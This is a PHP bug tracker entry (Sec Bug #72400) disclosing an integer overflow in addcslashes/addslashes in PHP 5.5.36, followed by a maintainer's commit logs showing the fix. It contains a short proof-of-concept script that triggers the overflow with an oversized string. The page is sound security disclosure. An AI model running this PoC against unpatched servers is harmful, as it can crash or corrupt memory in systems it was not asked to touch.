php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72400 Integer Overflow in addcslashes/addslashes
Submitted: 2016-06-14 09:41 UTC Modified: 2016-06-21 06:46 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.5.36 OS:
Private report: No CVE-ID: None
 [2016-06-14 09:41 UTC] taoguangchen at icloud dot com
Description:
------------
PoC:

```
<?php

ini_set('memory_limit', -1);
$str = str_repeat("'", 0xffffffff/4+1);
$str = addcslashes($str, "'");
//$str = addslashes($str);
var_dump(strlen($str));

?>
```


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-06-16 04:50 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-06-16 04:50 UTC] stas@php.net
See fix in bug #72403
 [2016-06-21 06:49 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 [2016-06-21 06:49 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-06-21 07:03 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 [2016-06-21 07:26 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 [2016-06-21 07:27 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 [2016-06-22 05:58 UTC] krakjoe@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sat Dec 21 11:01:30 2024 UTC